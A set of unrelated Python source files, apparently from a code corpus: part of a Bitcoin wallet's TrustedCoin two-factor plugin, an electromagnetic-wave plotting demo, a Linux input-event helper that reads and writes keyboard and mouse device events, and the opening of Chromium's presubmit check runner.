def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.storage.get('trustedcoin_billing_addresses', {}),
'segwit': self.storage.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address_segwit']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize()
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.storage.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(str(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
em_waves_demo1.py | """
Demo [em_waves](https://pypi.org/project/em-waves)
Running:
after installing em_waves with:
`pip3 install em_waves`
type:
`python3 em_waves_demo1.py`
"""
import multiprocessing
from em_waves import Medium, Sine, Gaussian, Rect
SHOW_PLOT = True
def proc_func(wave):
print (wave)
wave.show()
def print_recap(*args):
print(f"-"*20)
print(f"f_0: {args[0]} GHz")
print(f"-"*20)
print(f"ε_r_1: {args[1]:<10} ε_r_2: {args[2]}")
print(f"σ_1: {args[3]:<10} σ_2: {args[4]}")
print(f"-"*20)
def main():
print("Insert data when prompted, if skipped default value will be used.")
f_0 = float(input("Insert frequency in GHz: ") or 1.8)
ε_r_1 = float(input("Insert ε_r_1: ") or 1.0)
ε_r_2 = float(input("Insert ε_r_2: ") or 4.0)
σ_1 = float(input("Insert σ_1: ") or 0)
σ_2 = float(input("Insert σ_2: ") or 4e-10)
print_recap(f_0, ε_r_1, ε_r_2, σ_1, σ_2)
medium1 = Medium(ε_r=ε_r_1, μ_r=1, σ=σ_1)
medium2 = Medium(ε_r=ε_r_2, μ_r=2.5, σ=σ_2)
sine = Sine(f=f_0, A=10.0)
gaussian = Gaussian(rms=1.3)
rect = Rect(width=4)
sine.add_mediums(medium1=medium1, medium2=medium2)
gaussian.add_mediums(medium1=medium1, medium2=medium2)
rect.add_mediums(medium1=medium1, medium2=medium2)
sine.print_data()
if SHOW_PLOT:
# display plot windows in multithreading, or rather in multiprocessing since matplotlib crashes when multithreaded.
d = {0: sine, 1: gaussian, 2: rect}
p = []
for i in range(len(d)):
p.append( multiprocessing.Process(target=proc_func, args=(d[i],)) )
for proc in p:
proc.start()
for proc in p:
proc.join()
if __name__ == '__main__':
main()
|
_nixcommon.py | # -*- coding: utf-8 -*-
import struct
import os
import atexit
from time import time as now
from threading import Thread
from glob import glob
try:
from queue import Queue
except ImportError:
from Queue import Queue
event_bin_format = 'llHHI'
# Taken from include/linux/input.h
# https://www.kernel.org/doc/Documentation/input/event-codes.txt
EV_SYN = 0x00
EV_KEY = 0x01
EV_REL = 0x02
EV_ABS = 0x03
EV_MSC = 0x04
def make_uinput():
if not os.path.exists('/dev/uinput'):
raise IOError('No uinput module found.')
import fcntl, struct
# Requires uinput driver, but it's usually available.
uinput = open("/dev/uinput", 'wb')
UI_SET_EVBIT = 0x40045564
fcntl.ioctl(uinput, UI_SET_EVBIT, EV_KEY)
UI_SET_KEYBIT = 0x40045565
for i in range(256):
fcntl.ioctl(uinput, UI_SET_KEYBIT, i)
BUS_USB = 0x03
uinput_user_dev = "80sHHHHi64i64i64i64i"
axis = [0] * 64 * 4
uinput.write(struct.pack(uinput_user_dev, b"Virtual Keyboard", BUS_USB, 1, 1, 1, 0, *axis))
uinput.flush() # Without this you may get Errno 22: Invalid argument.
UI_DEV_CREATE = 0x5501
fcntl.ioctl(uinput, UI_DEV_CREATE)
UI_DEV_DESTROY = 0x5502
#fcntl.ioctl(uinput, UI_DEV_DESTROY)
return uinput
class EventDevice(object):
def __init__(self, path):
self.path = path
self._input_file = None
self._output_file = None
@property
def input_file(self):
if self._input_file is None:
try:
self._input_file = open(self.path, 'rb')
except IOError as e:
if e.strerror == 'Permission denied':
print('Permission denied ({}). You must be sudo to access global events.'.format(self.path))
exit()
def try_close():
try:
self._input_file.close
except:
pass
atexit.register(try_close)
return self._input_file
@property
def output_file(self):
if self._output_file is None:
self._output_file = open(self.path, 'wb')
atexit.register(self._output_file.close)
return self._output_file
def read_event(self):
data = self.input_file.read(struct.calcsize(event_bin_format))
seconds, microseconds, type, code, value = struct.unpack(event_bin_format, data)
return seconds + microseconds / 1e6, type, code, value, self.path
def write_event(self, type, code, value):
integer, fraction = divmod(now(), 1)
seconds = int(integer)
microseconds = int(fraction * 1e6)
data_event = struct.pack(event_bin_format, seconds, microseconds, type, code, value)
# Send a sync event to ensure other programs update.
sync_event = struct.pack(event_bin_format, seconds, microseconds, EV_SYN, 0, 0)
self.output_file.write(data_event + sync_event)
self.output_file.flush()
class AggregatedEventDevice(object):
def __init__(self, devices, output=None):
self.event_queue = Queue()
self.devices = devices
self.output = output or self.devices[0]
def start_reading(device):
while True:
self.event_queue.put(device.read_event())
for device in self.devices:
thread = Thread(target=start_reading, args=[device])
thread.setDaemon(True)
thread.start()
def read_event(self):
return self.event_queue.get(block=True)
def write_event(self, type, code, value):
self.output.write_event(type, code, value)
import re
from collections import namedtuple
DeviceDescription = namedtuple('DeviceDescription', 'event_file is_mouse is_keyboard')
device_pattern = r"""N: Name="([^"]+?)".+?H: Handlers=([^\n]+)"""
def list_devices_from_proc(type_name):
try:
with open('/proc/bus/input/devices') as f:
description = f.read()
except FileNotFoundError:
return
devices = {}
for name, handlers in re.findall(device_pattern, description, re.DOTALL):
path = '/dev/input/event' + re.search(r'event(\d+)', handlers).group(1)
if type_name in handlers:
yield EventDevice(path)
def list_devices_from_by_id(name_suffix, by_id=True):
for path in glob('/dev/input/{}/*-event-{}'.format('by-id' if by_id else 'by-path', name_suffix)):
yield EventDevice(path)
def aggregate_devices(type_name):
# Some systems have multiple keyboards with different range of allowed keys
# on each one, like a notebook with a "keyboard" device exclusive for the
# power button. Instead of figuring out which keyboard allows which key to
# send events, we create a fake device and send all events through there.
try:
uinput = make_uinput()
fake_device = EventDevice('uinput Fake Device')
fake_device._input_file = uinput
fake_device._output_file = uinput
except IOError as e:
import warnings
warnings.warn('Failed to create a device file using `uinput` module. Sending of events may be limited or unavailable depending on plugged-in devices.', stacklevel=2)
fake_device = None
# We don't aggregate devices from different sources to avoid
# duplicates.
devices_from_proc = list(list_devices_from_proc(type_name))
if devices_from_proc:
return AggregatedEventDevice(devices_from_proc, output=fake_device)
# breaks on mouse for virtualbox
# was getting /dev/input/by-id/usb-VirtualBox_USB_Tablet-event-mouse
devices_from_by_id = list(list_devices_from_by_id(type_name)) or list(list_devices_from_by_id(type_name, by_id=False))
if devices_from_by_id:
return AggregatedEventDevice(devices_from_by_id, output=fake_device)
# If no keyboards were found we can only use the fake device to send keys.
assert fake_device
return fake_device
def ensure_root():
if os.geteuid() != 0:
raise ImportError('You must be root to use this library on linux.')
|
presubmit_support.py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
__version__ = '1.8.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import ast # Exposed through the API.
import contextlib
import cPickle # Exposed through the API.
import cpplint
import cStringIO # Exposed through the API.
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import marshal # Exposed through the API.
import multiprocessing
import optparse
import os # Somewhat exposed through the API.
import pickle # Exposed through the API.
import random
import re # Exposed through the API.
import signal
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback # Exposed through the API.
import types
import unittest # Exposed through the API.
import urllib2 # Exposed through the API.
import urlparse
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners
import owners_finder
import presubmit_canned_checks
import scm
import subprocess2 as subprocess # Exposed through the API.
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate() and raise ProcessWasInterrupted.
class SigintHandler(object):
class ProcessWasInterrupted(Exception):
pass
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt())
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self):
with self.__lock:
self.__on_sigint()
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
if self.__got_sigint:
raise self.ProcessWasInterrupted
return stdout, stderr
sigint_handler = SigintHandler()
class ThreadPool(object):
def __init__(self, pool_size=None):
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of "python"
to vpython invocations.
"""
vpython = 'vpython.bat' if sys.platform == 'win32' else 'vpython'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
try:
start = time.time()
p = subprocess.Popen(cmd, **test.kwargs)
stdout, _ = sigint_handler.wait(p, test.stdin)
duration = time.time() - start
except OSError as e:
duration = time.time() - start
return test.message(
'%s exec failure (%4.2fs)\n %s' % (test.name, duration, e))
if p.returncode != 0:
return test.message(
'%s (%4.2fs) failed\n%s' % (test.name, duration, stdout))
if test.info:
return test.info('%s (%4.2fs)' % (test.name, duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
class PresubmitOutput(object):
def __init__(self, input_stream=None, output_stream=None):
self.input_stream = input_stream
self.output_stream = output_stream
self.reviewers = []
self.more_cc = []
self.written_output = []
self.error_count = 0
def prompt_yes_no(self, prompt_string):
self.write(prompt_string)
if self.input_stream:
response = self.input_stream.readline().strip().lower()
if response not in ('y', 'yes'):
self.fail()
else:
self.fail()
def fail(self):
self.error_count += 1
def should_continue(self):
return not self.error_count
def write(self, s):
self.written_output.append(s)
if self.output_stream:
self.output_stream.write(s)
def getvalue(self):
return ''.join(self.written_output)
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self, output):
output.write(self._message)
output.write('\n')
for index, item in enumerate(self._items):
output.write(' ')
# Write separately in case it's unicode.
output.write(str(item))
if index < len(self._items) - 1:
output.write(' \\')
output.write('\n')
if self._long_text:
output.write('\n***************\n')
# Write separately in case it's unicode.
output.write(self._long_text)
output.write('\n***************\n')
if self.fatal:
output.fail()
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, host):
self.host = host
self.cache = {}
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
However, API isn't very clear what's inside, so see tests for example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to cache. We'll modify it here adding description to
# it to the right patchset, if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].iteritems():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
